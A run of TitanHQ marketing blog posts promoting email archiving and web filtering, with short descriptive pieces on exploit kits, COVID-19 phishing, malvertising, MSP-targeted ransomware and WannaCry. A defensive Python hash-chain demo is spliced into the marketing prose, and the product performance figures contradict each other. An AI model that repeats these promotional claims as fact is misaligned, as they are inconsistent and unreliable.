Cloud-based email archives centralize disparate email servers and store all emails securely in the cloud, where they can be quickly and easily accessed by any authorized individual, from any location. Since many businesses now use cloud-based email, sending emails to a cloud-based archive makes more sense than using on-premises archives. Sending emails to the archive and recovering emails will be far quicker when both the mail service and the archive are in the cloud.
If you have an on-premises email archive, transitioning to a cloud-based service can save time and money. There is no need to maintain hardware or perform software updates, the archive is automatically backed up to guarantee emails can always be recovered, and storage space will never be an issue thanks to the scalability of the cloud.
TitanHQ’s Cloud-Based Email Archiving Solution
TitanHQ offers a cloud-based email archiving solution – ArcTitan Cloud – that is scalable to more than 60,000 users and delivers high performance and reliability. Every email sent and received by a company is automatically sent to the archive. Messages are deduplicated to save on storage space and are compressed in the archive. All emails are indexed and tagged to make searching a quick and easy process. Whenever an email needs to be recovered, a search of 30 million emails takes less than a second.
All emails are encrypted in transit to the archive and at rest, and the email archive is automatically backed up. If emails need to be accessed during a mail server outage, they can easily be found in the archive. ArcTitan really is a set-and-forget solution.
ArcTitan Cloud supports easy point-and-click search or expert search with a sophisticated query language. Searches can be saved, multiple searches can be performed at the same time, and you can search the entire archive, departments, user groups, or individual mailboxes. Permissions can be granted to employees to allow them to access their own archives, to ensure they never lose an email and do not need to trouble the IT department when they misplace one. You can search emails, but also inside all common file formats, including Microsoft Word, Excel and PowerPoint, PDF, RTF, ZIP, tar, gz, and Open Office documents.
Migrating from an existing cloud archiving service or an on-premises archive to ArcTitan Cloud is a quick and easy process and support will be provided if required. There are no proprietary data formats used, so if you ever want to export your data, that is a quick and easy process too.
Many email archiving services require you to pay for all mailboxes, even when employees leave the company. With ArcTitan, you only pay for the number of active mailboxes, and there are no limits on storage space. The solution is easy to implement, use, and maintain, all of which have made it incredibly popular with SMBs and MSPs serving the SMB market. On top of that, ArcTitan is one of the most cost-effective archiving solutions for businesses.
Figures correct as of July 2020.
For more information on cloud-based email archiving and the ArcTitan solution, give the TitanHQ team a call today.
While the telephone remains a vital tool for business, a great many transactions and conversations now take place over email. More than 306 billion emails are now being sent every day, and a business with 100 employees will typically send or receive around 4,000 emails a day, many of which will contain important information that is critical to the successful operation of the business.
The loss of emails could prove very costly for businesses, as much of the information stored in emails and email attachments is saved nowhere else. In the event of disaster, such as corrupted PST files, hardware failure, or a destructive cyberattack, email data could well be permanently lost.
Not only could the loss of email hamper the ability of a business to operate, it could potentially result in a significant financial penalty. 24% of organizations have reported receiving a request from a court or regulatory body to produce emails. If emails can’t be produced, the cost of the financial penalties does not even bear thinking about. They could prove catastrophic to a business.
Most businesses back up their emails as part of their disaster recovery plans, but there are problems with backups. Backups cannot be searched, so finding emails can take an extraordinary amount of time. To ensure that emails are never lost and can be found and recovered in a matter of seconds or minutes, most businesses choose to use an email archiving solution.
Here we list 10 of the most important reasons for using an email archiving solution.
10 Reasons Why Businesses Should Archive Emails
Data Loss Prevention
One of the most important reasons for using an email archive is data loss prevention. Emails are sent to the archive for long-term, secure storage. If an employee accidentally deletes an important email from their inbox, the message will not be lost, as it can easily be recovered from the archive.
Mail Server Performance
The volume of emails now being sent places a strain on email servers, and having large volumes of emails stored on the server negatively affects server performance. Storage space can also become an issue. By sending emails to an archive, they can be removed from the mail server, which will greatly improve performance.
Litigation and eDiscovery
In the event of a lawsuit, you are likely to be required to produce emails related to the case and you will only have a short period of time in which to respond. Finding emails in PST files and backups can be an extraordinarily time-consuming process, and you may have to search through several years of email data to find all the emails you need. You must also ensure that the messages are original and have not been altered in any way. An email archive makes responding to eDiscovery requests and finding and producing emails a quick and simple process.
IT Department Productivity
The IT department has to spend a considerable amount of time on managing the email system and resolving email storage issues. When employees delete or lose important emails, the IT support desk is expected to respond. Sending emails to an archive eliminates email storage issues and simplifies maintenance. Employees can be allowed to access their own archives and can easily search for emails, saving the IT department a lot of time that can be put to much better use.
In the event of hardware failure, email data can easily be lost. Laptop computers may be lost or stolen, again resulting in the loss of email data. Ransomware and wiper malware attacks could easily wipe out the email system and could potentially result in critical data loss. By sending emails to the archive, in the event of disaster, emails can quickly and easily be recovered.
If you operate in a highly regulated industry you will need to retain email data for a set period of time, but all businesses must retain certain types of data, much of which is stored in email. An email archive helps with regulatory compliance. Data can be tagged and retention periods can be set, with emails automatically deleted when the legal retention period is over.
Data Access and Right to be Forgotten Requests
The General Data Protection Regulation (GDPR) and other laws give individuals the right to request a copy of the information that a company holds on them. If a request for access to personal data is received, the data must be produced quickly. An email archive allows you to instantly search for email data and quickly respond to right-of-access and right-to-be-forgotten requests.
There will likely be many occasions when you need to conduct internal audits of email data to find out what employees have been communicating via email. In the event of a customer dispute or an HR issue, you will need to search email data. An email archive makes this quick and easy, and allows you to resolve issues promptly without having to involve the IT department.
In the event of disaster, you will need to have quick access to email. If an employee suddenly leaves the company, you will need to find all emails related to specific clients. With easy access to email and with the advanced search capability of an email archiving solution, you will be able to ensure business can continue as normal.
Searching for lost emails, managing email servers, responding to eDiscovery requests, and producing email data for audits can take an extraordinary amount of time. An email archive will slash the amount of time that needs to be devoted to these issues and helps you avoid unnecessary costs. An email archiving solution will more than pay for itself in terms of the costs saved.
ArcTitan – Cloud-Based Email Archiving from TitanHQ
ArcTitan is a powerful, secure, cloud-based email archiving solution from TitanHQ that ensures you will never lose an email. ArcTitan acts as a black box flight recorder for email and gives you total protection against email data loss.
The solution is fully compliant with all industry regulations; email data is protected with end-to-end encryption and is encrypted in the archive; and the solution is quick to set up, easy to use, and effortless to manage.
Lightning-fast searches can be performed when you need to find emails: messages are sent to the archive automatically at a rate of 200 emails a second, and searches of 30 million emails take less than a second.
There are no limits on storage space, no onsite hardware requirements, and you only pay for the number of active mailboxes. Businesses that use ArcTitan typically save up to 80% of email storage space.
For more information on ArcTitan, details of pricing, or to book a free demo, call the ArcTitan team today!
Exploit kits used to be one of the most common methods of distributing malware, although their use has dwindled to a fraction of the level seen in 2016. That said, there has recently been an uptick in the use of exploit kits and multiple threat actors are conducting campaigns to deliver malware payloads.
An exploit kit is malicious code that incorporates exploits for one or more vulnerabilities. When a visitor arrives on a website hosting an exploit kit, their computer is scanned for vulnerabilities, and if one of the targeted vulnerabilities is found, the exploit is executed and a malicious payload such as a banking Trojan, keylogger, or ransomware is silently downloaded.
Exploit kits are loaded onto websites under the control of the attackers, which can be their own domains or a legitimate site that has been compromised. Traffic is usually sent to the exploit kit through malicious adverts on third-party ad networks (malvertising). These ad networks are used by many websites for adding revenue-generating third-party adverts.
According to research conducted by Malwarebytes, a campaign is being conducted using the Fallout exploit kit to deliver Raccoon Stealer, with the EK loaded onto popular adult websites. The campaign was reported to the ad network and the malicious advert was removed, only to be replaced with an advert directing visitors to a site hosting the Rig exploit kit.
Another campaign was identified involving a different threat actor who is known to have targeted various adult ad networks. The malicious adverts were displayed on a wide range of different adult websites, including one of the most popular adult websites that generates more than 1 billion page views a month.
The threat actor had submitted bids for users of Internet Explorer only, as the exploit kit contained an exploit for an unpatched IE vulnerability. The vulnerabilities exploited were CVE-2019-0752 and CVE-2018-15982; the former is an IE vulnerability and the latter is a vulnerability in Adobe Flash Player. In this campaign, Smoke Loader malware was delivered, along with Raccoon Stealer and ZLoader.
For an exploit kit to work, a computer must have an unpatched vulnerability, an exploit for which must be included in the EK. Prompt patching is therefore one of the best ways of ensuring that these attacks are not successful. It is also strongly advisable to stop using Internet Explorer and Flash Player. Vulnerabilities in each are frequently targeted.
These campaigns can also easily be blocked by using a web filter. Unless your business operates in the adult entertainment sector, access to adult content on work devices should be blocked. A web filter allows your business to block access to all adult websites, and other categories of web content that employees should not be accessing in the workplace.
A cloud-based web filter such as WebTitan is a low-cost solution that can protect against web-based attacks such as exploit kits and drive-by malware downloads, while also helping businesses to improve productivity by preventing employees from visiting websites that have no work purpose. Web filters can also reduce legal liability by preventing employees from engaging in illegal online activities, such as copyright-infringing file downloads.
Once implemented – a process that takes a few minutes – access to certain categories of website can be blocked with the click of a mouse and employees will be prevented from accessing websites known to harbor malware, phishing kits, and other potentially malicious websites.
For further information on WebTitan and protecting your business from web-based threats, give the TitanHQ team a call today.
COVID-19 has created a great many challenges for businesses and has forced them to adapt to a new way of working very quickly. Businesses that had mostly office-based workers have had to change to having virtually everyone working remotely.
Employees working from home are maintaining contact via IM solutions, email, and videoconferencing platforms such as Zoom and Microsoft Teams, but in contrast to office-based work, businesses are now relying on their employees to stay connected and remain productive.
While most businesses have adapted to the new way of working, many business leaders are concerned about how to protect their data and maintain compliance with most of their employees working from home. Employers have had to accept that remote working, to some degree, is now the new normal, so steps must be taken to ensure business and email continuity.
On Tuesday, September 22, 2020, TitanHQ is hosting a webinar to discuss these and other concerns and offer a solution that can help to keep businesses moving forward when employees are working remotely.
During the webinar TitanHQ experts will discuss the following topics:
The Current 2020 Technology Landscape
Security & Compliance in a time of Global Remote Working
Increase in Companies Relying Solely on Office 365
Protecting Business Critical Data
The Importance of Continuity in the Era of Remote Working
Attendees will also be given a live demo of TitanHQ’s cloud email archiving solution, ArcTitan.
Title: How to Ensure Business Continuity with Email Archiving for your Remote Workforce
Many businesses have created an email archive for compliance purposes and to ensure emails, documents, calendars, and other data in the email system are preserved to meet regulatory obligations and for disaster recovery.
Many businesses only discover after they have been using an email archive that it does not quite live up to expectations, is proving to be expensive, or the archive is no longer performing as well as it should.
Once you have set up an email archive, it does not mean that you are tied to any provider. Migrating your email archive to another provider that offers a service that is more suited to your organization requires a little planning, but it can be a pain free process.
Is it Time to Upgrade your Email Archive?
One of the main reasons for changing an email archive is that legacy archives have become sluggish due to the volume of backed-up data. Over time, these legacy archives can become unreliable, searches do not always return all the results, and in some cases the archiving solution reaches end of life and patches are no longer issued, so security becomes an issue.
Storage space can become a problem if you are using aging email archiving appliances or physical servers, and latency can increase, especially if you have transitioned to cloud-based applications such as Office 365. If an email archive is failing to perform, it is time to upgrade to a new archiving solution; one that is more modern, can be searched much more rapidly, and does not pose a security risk to your organization.
Cloud Email Archives Can Solve Your Archiving Problems
With an increasing number of organizations having migrated to Office 365, using a cloud-based email archiving service makes a great deal of sense. Your email data is already in the cloud, so switching to a cloud-based email archive is a logical step. Moving data from the cloud to on-premises infrastructure is likely to involve some degree of latency, whereas archiving from a cloud service to another will avoid these latency problems and see improvements in performance.
You will not need to maintain on-premises hardware with a cloud-based archive. The email archiving service provider is responsible for maintaining the hardware, patching, and performing updates. Cloud-based email archives also have scalability. As your email volume grows, your archive automatically scales, and more storage space is made available. You will never run out of storage space with a cloud email archiving service. Your cloud email service provider will just arrange for more servers to be made available.
Cloud email archives can also be accessed from any location, on any device, through either an email client or web browser – something that has become much more important during the COVID-19 pandemic, with many employees now working from home.
Making the change to a new email archiving service provider will likely greatly improve performance and allow faster archiving and searching. That means considerable productivity gains and fewer headaches for your IT department, as the maintenance burden will be eased.
Companies that switch from legacy email archives to cloud archiving services can greatly reduce the cost of email archiving, allowing them to put their resources to much better use. Even switching from one cloud email archiving solution to another can see considerable costs saved.
ArcTitan: Save Costs and Improve the Performance of Your Archive
Regardless of the current email archiving solution you are using, migrating your email archive to ArcTitan is a straightforward and quick process. TitanHQ will guide you through the migration process, providing detailed steps to take to get your archive migrated quickly. Alternatively, we can talk you through the process and even work with your current provider directly to transfer your archive.
If you are upgrading from a legacy email solution to Office 365, you can simply transfer your archived data to ArcTitan, rather than send it to Office 365. Again, full assistance will be provided by our knowledgeable engineers.
Many ArcTitan customers have managed to reduce the load on their mail servers by 80%, significantly improving performance. Maintenance time can be slashed by around 50%, and the cost savings are considerable.
Then there is the speed of the solution. ArcTitan conducts searches at a rate of 30 million emails a second, searches can be combined, multiple searches run at once, and emails and attachments searched in the same search. Searches can also be saved if you conduct them frequently.
Security is assured with email data protected by end-to-end encryption, with passwords hashed and encrypted. Your archive is encrypted and stored securely on Replicated Persistent Storage on AWS S3 and will be automatically backed up. Updates are managed for you and there will never be any patches to apply.
On top of all the features of ArcTitan, many of which are lacking in other email archiving solutions, you are also likely to be pleasantly surprised at the price of the solution (and the margin if you are an MSP looking to add email archiving to your service stack.)
For more information about ArcTitan and migrating your archive, give the TitanHQ team a call today and take the first step toward eliminating your email archiving headaches.
What our Customers Say…
“Fast, scalable, very easy to operate and has all the email archiving features a company needs to have. Safe and the cost was fantastic. A truly superb email archiving tool.” Jesse Gusmao, IT Manager. Sociedade Hospital Samaritano, Brazil
“I can tell you our experience has been outstanding. ArcTitan email archive has been the most effective solution we’ve found. Initially, we tested it for ourselves, but given the success we’ve had, we’re now signed up as a reseller and are confidently introducing the product to our small and medium clients.” Lou Liberio, IT Director. Clarion Data Systems, USA
“Exceptionally easy to install and insert into our email infrastructure. The effect and affect of ArcTitan Email Archiving was dramatic. The load on our Exchange server was reduced by 80% immediately.” Mike Pluta, IT Director. NRC Broadcasting, USA
Several thousand email messages can be received by a business every day, and many of those messages contain important documents and sensitive information, which in some cases is saved nowhere else other than the email system or on a user’s local device.
Several regulations require email data to be backed up and stored for a certain time period, with many businesses choosing to store copies of business emails using backups. While backups will allow a business to comply with regulations and ensure messages can be recovered in the event of disaster, backups are not searchable which makes recovery of emails a time-consuming process.
An email archive is a much better solution. Email archives store emails in a tamper-proof repository and, in contrast to backups, emails and attachments are indexed before being sent for long-term storage, which allows them to be searched on demand. When an email needs to be found, a search can be performed and individual emails can be found and recovered in seconds or minutes, whereas the process of finding and recovering emails from a backup could take days.
In the event of a legal investigation, it is essential for emails to be produced. Businesses must be able to prove the integrity of email data and show that the copy produced is the original and has not been altered since being sent or received. If you cannot prove the integrity of email messages, you could get into serious legal trouble. In the event of a cyber-incident, email messages are checked in the investigation process, so it is also essential to maintain message integrity and ensure all emails can quickly be recovered.
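The integrity requirement described above is what a tamper-evident archive has to deliver: any change to a stored message, and any silent removal of messages, must be detectable later. The following Python is an added illustration of one standard way to achieve that (a hash chain with an externally recorded head); it is not ArcTitan's implementation, which this page does not describe, and the sample messages are constructed for the demo.

```python
import hashlib
from dataclasses import dataclass, replace
from typing import List

GENESIS_HASH = "0" * 64  # anchor value used as prev_hash for the first entry


@dataclass(frozen=True)
class ArchiveEntry:
    seq: int          # position in the archive
    message: bytes    # raw message as received (RFC 5322 text)
    prev_hash: str    # entry_hash of the previous entry, linking the chain
    entry_hash: str   # SHA-256 over (seq, prev_hash, SHA-256(message))


def entry_digest(seq: int, message: bytes, prev_hash: str) -> str:
    """Digest binding a message to its position and to the entry before it."""
    h = hashlib.sha256()
    h.update(seq.to_bytes(8, "big"))
    h.update(prev_hash.encode("ascii"))
    h.update(hashlib.sha256(message).digest())
    return h.hexdigest()


class HashChainedArchive:
    """Append-only store in which every entry commits to the one before it."""

    def __init__(self, entries=None):
        self.entries: List[ArchiveEntry] = list(entries or [])

    def append(self, message: bytes) -> ArchiveEntry:
        seq = len(self.entries)
        prev = self.entries[-1].entry_hash if self.entries else GENESIS_HASH
        entry = ArchiveEntry(seq, bytes(message), prev, entry_digest(seq, message, prev))
        self.entries.append(entry)
        return entry

    def head(self) -> str:
        """Hash of the newest entry; record it out of band (WORM media, notary)."""
        return self.entries[-1].entry_hash if self.entries else GENESIS_HASH

    def verify_chain(self) -> List[int]:
        """Seq numbers of entries whose stored hash or link no longer checks out."""
        bad = []
        prev = GENESIS_HASH
        for i, e in enumerate(self.entries):
            if e.seq != i or e.prev_hash != prev or e.entry_hash != entry_digest(i, e.message, prev):
                bad.append(i)
            prev = e.entry_hash
        return bad

    def head_matches(self, recorded_head: str) -> bool:
        """Catches truncation or a rewrite that kept the chain self-consistent."""
        return self.head() == recorded_head


# Constructed sample messages (not real mail) used to build the demo archive.
SAMPLE_MESSAGES = [
    b"From: finance@example.com\r\nTo: ceo@example.com\r\nSubject: Q2 invoice\r\n\r\nInvoice attached.\r\n",
    b"From: hr@example.com\r\nTo: staff@example.com\r\nSubject: Policy update\r\n\r\nSee the new handbook.\r\n",
    b"From: legal@example.com\r\nTo: ceo@example.com\r\nSubject: Contract\r\n\r\nSigned copy enclosed.\r\n",
]


def build_sample_archive() -> HashChainedArchive:
    archive = HashChainedArchive()
    for msg in SAMPLE_MESSAGES:
        archive.append(msg)
    return archive


def tamper_message(archive: HashChainedArchive, seq: int, new_message: bytes) -> HashChainedArchive:
    """Simulated attacker: edits a stored message but leaves all hashes alone."""
    entries = list(archive.entries)
    entries[seq] = replace(entries[seq], message=new_message)
    return HashChainedArchive(entries)


def rewrite_entry(archive: HashChainedArchive, seq: int, new_message: bytes) -> HashChainedArchive:
    """Simulated attacker: edits a message and recomputes that entry's hash only."""
    entries = list(archive.entries)
    e = entries[seq]
    entries[seq] = replace(e, message=new_message,
                           entry_hash=entry_digest(e.seq, new_message, e.prev_hash))
    return HashChainedArchive(entries)


if __name__ == "__main__":
    archive = build_sample_archive()
    recorded_head = archive.head()          # would be stored outside the archive
    print("intact:", archive.verify_chain(), archive.head_matches(recorded_head))
    edited = rewrite_entry(archive, 2, b"Subject: altered\r\n\r\nchanged\r\n")
    print("rewritten last entry:", edited.verify_chain(), edited.head_matches(recorded_head))
```

The point the demo makes is that the chain alone is not enough: an attacker who can rewrite the newest entry and its hash leaves a self-consistent chain, which is why `head()` must be recorded somewhere the archive's administrators cannot quietly change, and why `head_matches()` is part of every integrity check.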
Given the number of emails received by businesses every day, the amount of storage space that must be devoted to emails and attachments grows quickly. Businesses are likely to require terabytes of storage space, which can prove costly. A cloud-based archive ensures that there is always sufficient storage space available, and rules can be set to delete emails and attachments securely when they are no longer required to be retained by law. A cloud-based archive can reduce storage use by up to 75% compared to on-premises storage and reduce maintenance time by up to 50%, resulting in significant cost savings.
Many businesses use Outlook for email, which stores emails in Personal Storage (PST) files. These files are stored locally on each user’s device and are not tamper-proof. They can also become corrupted, can be targeted in cyberattacks, and are at risk of being accidentally deleted. If these files are not backed up, in the event of data corruption or accidental deletion, they cannot be recovered. Using an email archive ensures that all users’ email data can be recovered, and users’ PST files can be quickly and easily restored. Without an email archive, critical business emails could easily be lost.
If you are required to comply with the E.U. General Data Protection Regulation, you must be able to search for data in email if a request is made by an E.U. citizen to access their data or if they exercise their ‘right to be forgotten.’ If you have an email archive, searches can be performed quickly, and it is easy to satisfy these GDPR requests. The failure to respond to these requests quickly could easily result in a substantial fine for noncompliance.
Should you ever need to change email systems and migrate to new email servers, all inboxes, messages, and attachments will need to be migrated to the new server. If you do not have the right systems in place, that process can be difficult and time-consuming. Using an email archive makes the process faster and simpler, ensuring seamless migrations with few errors, saving considerable time and effort.
In summary, an email archive will…
Ensure a tamper-proof copy of email data is retained and is always accessible
Allow you to search millions of emails in seconds
Reduce server management costs
Allow eDiscovery requests to be processed quickly
Protect email data against cyberattacks and ensure it can always be recovered in the event of a data destruction event
Allow email migrations to be performed quickly and easily without data corruption
Reduce storage space by 50% or more and greatly reduce costs
Maintain an audit trail to ensure compliance with regulations such as Sarbanes-Oxley (SOX), PCI-DSS, SEC, DPA, HIPAA, and GDPR
Free up IT support time by allowing employees to access their own email archives
Help with compliance and ensure data can be quickly found and produced in the event of an investigation
ArcTitan: Email Archiving Made Simple
ArcTitan is a powerful email archiving solution from TitanHQ that makes archiving email, performing searches, and recovering email data a quick and simple process.
Key Features of ArcTitan
Scalable email archiving that grows with your business
Email data stored securely in the cloud on Replicated Persistent Storage on AWS S3
Lightning fast searches – Search 30 million emails a second
Rapid archiving at up to 200 emails a second
Automatic backups of the archive
Email archiving with no impact on network performance
Ensure an exact, tamper-proof copy of all emails is retained
Easy data retrieval for eDiscovery
Protection for email from cyberattacks
Eliminate PSTs and other security risks
Facilitates policy-based access rights and role-based access
Only pay for active users
Slashes the time and cost of eDiscovery and other formal searches
Migration tools to ensure the integrity of data during transfer
Seamless integration with Outlook
Supports single sign-on
Save and combine searches
Perform multiple searches simultaneously
Limits IT department involvement in finding lost email – users can access their own archived email
Compliant with regulations such as HIPAA, SOX, GDPR, Federal Rules of Civil Procedure, etc.
If you are not yet archiving your email, are unhappy with your current provider, or are an MSP that is not yet offering email archiving to your clients or is unhappy with the service or margins with your current provider, give the TitanHQ team a call to find out more about ArcTitan.
The COVID-19 pandemic created a massive opportunity for cybercriminals, and they have been exploiting it with vigor, especially in phishing campaigns. Phishing is the use of deception to trick someone into performing an action. Social engineering techniques are used to get people to open malicious email attachments, visit hyperlinks to websites where sensitive information is harvested, or to take other actions such as make donations to fake charities.
In the early stages of the pandemic when little was known about the virus, how it was spread, the risk of infection, and the disease it caused, the public was very much in the dark and craved information. This created the perfect opportunity for cybercriminals for use in phishing and other cyberattacks.
Recently, the United Nations released data collected about phishing attacks involving COVID-19 related themes showing there had been a 350% increase in new phishing websites in the first quarter of the year, many of which were health-related and targeted health systems and hospitals.
Research conducted by Check Point also found a major rise in domain registrations linked to COVID-19. Research showed that phishing attacks increased from around 5,000 a week in February to more than 200,000 per week by late April, many of which were linked to COVID-19.
Early in the year, the lack of knowledge about COVID-19 and the SARS-CoV-2 virus suited large-scale phishing campaigns involving millions of messages, with cybercriminals re-purposing their normal campaigns and starting to use COVID-19 themed websites and lures. Phishing emails offered information about the virus, possible cures, and advice on avoiding infection. When there was a shortage of personal protective equipment, phishing lures were used offering low-cost supplies and testing kits.
Now that there is more information about the virus, and PPE shortages have largely been addressed, phishing scams related to COVID-19 have evolved. A study conducted by ProPrivacy showed that, far from COVID-19 related phishing attacks disappearing and cybercriminals returning to their old campaigns using fake invoices and the like, these campaigns are still running, but they have become more targeted and sophisticated.
These targeted campaigns offer answers to new questions being raised by the public, such as whether it is safe for children to return to schools. The study, conducted in partnership with VirusTotal and WHOIS XML, identified that 1,200 COVID-related domains were still being registered each day, and a sample of 600,000 of those domains revealed that around 125,000 of them were malicious and were mostly being used for phishing.
We can expect to see another wave of phishing emails and websites set up related to COVID-19 vaccines when they start to come to market. Since the threat has not gone away and is likely to remain for some time to come, it is important to remain on your guard and to be cautious with any emails received, especially those related to COVID-19.
Businesses also need to take extra care to ensure that their employees and devices are protected. Most businesses will already have a spam filtering solution in place to block phishing emails, but now is a good time to review those controls. If spam and phishing emails are still reaching inboxes, consider an alternative solution or a third-party spam filter if you are using Office 365 and are relying on Exchange Online Protection for spam and phishing protection.
One anti-phishing measure that is less commonly used by businesses is a web filter. A web filter allows businesses to control the websites and webpages that their employees can visit. Web filters, such as WebTitan, block access to websites known to be malicious, such as those known to be used for phishing. Web filters also categorize websites and allow certain categories to be blocked. By carefully controlling the web content that can be accessed by employees, businesses will be much better protected against phishing attacks and other cyberattacks with a web-based component.
It is also strongly recommended to implement 2-factor authentication, which will provide protection in the event of credentials being compromised in a phishing attack.
If you would like more information about web filtering, WebTitan, or improving your spam filter, give the TitanHQ team a call.
Cybercriminals have adopted a new tactic to deliver malware and conduct phishing attacks on unsuspecting internet users. They are hijacking inactive domains and using them to direct visitors to malicious websites in a form of malvertising.
Malvertising is the term given to the use of malicious code in seemingly legitimate adverts, which are often displayed on high-traffic websites. Website owners use third-party ad networks as a way to increase revenue from their websites. Most of these adverts are genuine and will direct users to a legitimate website, but cybercriminals often sneak malicious code into these adverts. Clicking the link will direct the user to a website hosting an exploit kit or phishing form. In some cases, ‘drive-by’ malware downloads occur without any user interaction, simply if the web content loads and the user has a vulnerable device.
The new tactic uses domains that have expired and are no longer active. These websites may still be listed in the search engine results for key search terms. When a user conducts a search and clicks the link, or uses a link in their bookmarks to a previously visited website, they will arrive at a landing page that explains that the website is no longer active. Oftentimes, that page will include a series of links that will direct the visitor to related websites.
What often happens is these expired domains are put up for sale. They can be attractive for purchasers as there may already be many links to the website, which is preferable to starting a brand-new website from scratch. These expired domains are then auctioned. Researchers at Kaspersky found that cybercriminals have taken advantage of these auction-listed websites and have added links that direct visitors to malicious websites.
When a visitor arrives on the site, instead of being directed to the auction stub, the stub is replaced with a link to a malicious website. The study uncovered around 1,000 domains that had been listed for sale on a popular auction site, which redirected visitors to more than 2,500 unwanted URLs. In the majority of those cases, the URLs were ad-related pages, but 11% of the URLs were malicious and were mostly being used to distribute the Shlayer Trojan via infected documents that the user is prompted to download. The Shlayer Trojan installs adware on the user’s device. Several of the sites hosted malicious code on the site rather than redirecting the visitor to a different website.
These domains were once legitimate websites but are now being used for malicious purposes, which makes the threat hard to block. In some cases, the sites will display different content based on where the user is located and whether they are using a VPN to access the internet. These websites change content frequently, but they are indexed and categorized, and if determined to be malicious they are added to real-time block lists (RBLs).
A web filtering solution such as WebTitan can provide protection against malvertising and redirects to malicious sites. If an attempt is made to send a user to a known malicious website, rather than being connected the user will be directed to a local block page, negating the threat. WebTitan can also be configured to block downloads of risky file types from these websites.
Many organizations have implemented firewalls to prevent direct attacks by hackers, use antivirus software to block malware, and use an anti-spam solution to block attacks via email, but there is a gap in their security protections and web-based threats are not effectively blocked. WebTitan allows organizations to plug that gap and control the websites that can be accessed by employees.
For further information on WebTitan and filtering the internet, give the TitanHQ team a call. WebTitan is available on a free trial to allow you to evaluate the solution and see for yourself how you can block attempts to visit malicious web content and NSFW sites.
TitanHQ customers that are currently using the ArcTitan email archiving solution for long term email storage will soon benefit from a vastly improved email archiving service. TitanHQ is in the process of migrating customers to new email archiving systems that have been developed to improve performance, reliability, and scalability.
The new ArcTitan email archiving service is being delivered on new infrastructure – a highly available, horizontally scaling Kubernetes cluster that is self-maintaining and self-healing. Within the cluster are multiple components that work in harmony, but independently. This has the advantage of ensuring that in the event of a server outage, or if a component goes down, there will be minimal or no downtime. Any time a component goes down, all others will remain available and the component that has gone down will be taken offline and automatically repaired. Other components will not be affected.
The new email archiving systems offer replicated persistent storage through Ceph storage clusters. This provides high-performance storage and file systems, with automated data replication and failover. Amazon S3 is used for long-term storage of archived email data, providing reliability, redundancy, and scalability. A Percona XtraDB MySQL cluster is deployed within Kubernetes for handling all database operations. The cluster is self-maintaining, self-healing, and can be scaled with minimal effort and zero downtime. Customers are also provided with a new and improved ArcTitan GUI.
Managing the Migration
TitanHQ is in the process of migrating ArcTitan customers to the new system and the process will be completed with minimal customer effort. First, TitanHQ will create a new account on the new infrastructure. Once the new account has been set up, TitanHQ will be in touch to provide the details and talk you through making a simple change to your connector/mail server to point it to the new server. Once that change has been made, all archived email will be sent to the new archive and the old account will receive no further archived emails. Once TitanHQ has verified mail flow, you will be told that the process has been completed.
TitanHQ will then commence the migration of your archive to the new account. Once that process has been completed, you will be contacted and asked to verify the data migration. Once confirmation has been received, the old archive on the original server will be deleted.
There will be a small delay between sending email to the new account and migrating your historical email data, but customers will not lose access to the old archive. Searches can still be performed on the old archive and you will retain full access to all of your historical email data during the migration.
If you have any questions about the migration or the new ArcTitan email archiving systems, our customer service team will be more than happy to help.
Managed Service Providers are an attractive target for cybercriminals. If a threat actor succeeds in gaining access to an MSP’s network, they can use the same remote management tools that MSPs use to conduct attacks on the MSP’s clients.
Many companies are now turning to MSPs for IT support and management services. This is often the most cost-effective solution, especially when companies lack the in-house IT expertise to manage their networks, applications, and security. An MSP will typically provide IT management services for many different companies. A successful cyberattack on the MSP can therefore give a threat actor access to the networks of all the MSP’s clients, which makes the attack extremely profitable.
There was a marked increase in cyberattacks on managed service providers in 2019, in particular by ransomware gangs using GandCrab, Sodinokibi, BitPaymer, and Ryuk ransomware. The MSPs were attacked in a variety of ways, including phishing, brute force attacks on RDP, and exploitation of unpatched vulnerabilities.
Once access has been gained to an MSP’s network, hackers search for remote management tools such as Webroot SecureAnywhere and ConnectWise, which the MSP uses to access its clients’ networks to provide IT services. Several 2019 ransomware attacks on MSPs used these tools to access clients’ networks and deploy ransomware. MSPs such as PerCSoft, TrialWorks, BillTrust, MetroList, CloudJumper, and IT by Design were all attacked in 2019, and ransomware was deployed on their and their clients’ networks.
Kyle Hanslovan, CEO at Huntress Labs, told ZDNet in a recent telephone interview that his company had provided support to 63 MSPs that had been attacked in 2019 but believes the total number of attacks was likely to be more than 100. However, the number of MSPs that have been attacked is likely to be substantially higher. It is likely that many cyberattacks on MSPs are not even detected.
The attacks have shown no sign of slowing. Recently the U.S. Secret Service issued a TLP Green alert warning MSPs of an increase in targeted cyberattacks. Compromised MSPs have been used to conduct business email compromise (BEC) attacks to get payments sent to attacker-controlled accounts. Attacks have been conducted on point-of-sale (POS) systems and malware has been deployed that intercepts and exfiltrates credit card data, and there have been many successful ransomware attacks.
In addition to cybercriminals, nation state-sponsored hacking groups have also been conducting cyberattacks on MSPs, notably hacking groups linked to China. The National Cybersecurity and Communications Integration Center (NCCIC) issued an alert about the threat to MSPs from state-sponsored hacking groups in October 2019.
Best Practices for MSPs to Adopt to Improve Their Security Posture
There are several best practices that can be adopted by MSPs to improve security and block these attacks. MSPs may currently be incredibly busy helping their clients deal with IT issues related to the COVID-19 pandemic, but given the increase in targeted cyberattacks on MSPs, time should be spent improving their own security, not just security for their clients.
The U.S. Secret Service recommends MSPs keep up to date on patching, especially patches for any remote administration tools they use. ConnectWise issued a security advisory last month and patched a flaw in the ConnectWise Automate solution. The API vulnerability could be exploited remotely by a threat actor to execute commands and/or modifications within an individual Automate instance. Vulnerabilities such as these are actively sought by cybercriminals.
The principle of least privilege should be adopted for access to resources to limit the harm caused in the event of a breach. It is also important to have well-defined security controls that are fully compliant with industry standards.
Annual data audits should be conducted along with regular scans to identify malware that may have been installed on systems. Logging should be enabled, and logs should be regularly checked to identify potentially malicious activity. MSPs should also ensure that their employees receive regular security awareness training to teach cybersecurity best practices and how to identify phishing and BEC scams.
The WannaCry ransomware attacks that started on May 12, 2017 were blocked quickly when a kill switch was identified and activated, but how much money did WannaCry make during the time it was active?
WannaCry was a devastating global cyberattack, the likes of which had been predicted by many cybersecurity professionals but had yet to materialize. WannaCry was the fastest spreading ransomware ever created.
WannaCry combined ransomware with a worm, which allowed it to automatically spread and infect huge numbers of devices on a network. The ransomware exploited a vulnerability in Windows Server Message Block (SMBv1) using an NSA exploit called EternalBlue.
